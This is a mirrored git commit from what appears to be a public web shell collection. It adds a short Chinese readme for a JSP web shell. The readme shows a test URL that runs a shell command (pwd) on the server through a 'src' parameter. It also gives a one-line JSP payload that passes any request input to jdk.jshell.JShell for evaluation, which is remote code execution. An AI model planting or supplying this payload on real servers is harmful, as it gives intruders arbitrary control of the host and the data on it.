mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
Create jshell.md
This commit is contained in:
parent
294061690e
commit
e46fdc2bd8
1 changed files with 9 additions and 0 deletions
9
jsp/p2j.cn/jshell.md
Normal file
9
jsp/p2j.cn/jshell.md
Normal file
|
@ -0,0 +1,9 @@
|
|||
readme
|
||||
|
||||
![](http://p2j.cn/uploads/image/20190910/20190910185302_297.png)
|
||||
测试用例:http://localhost:8080/modules/jshell.jsp?src=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(Runtime.getRuntime().exec(%22pwd%22).getInputStream())).readLine()
|
||||
|
||||
如果强迫症想撸掉多余的输出:
|
||||
|
||||
|
||||
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
|
Loading…
Add table
Reference in a new issue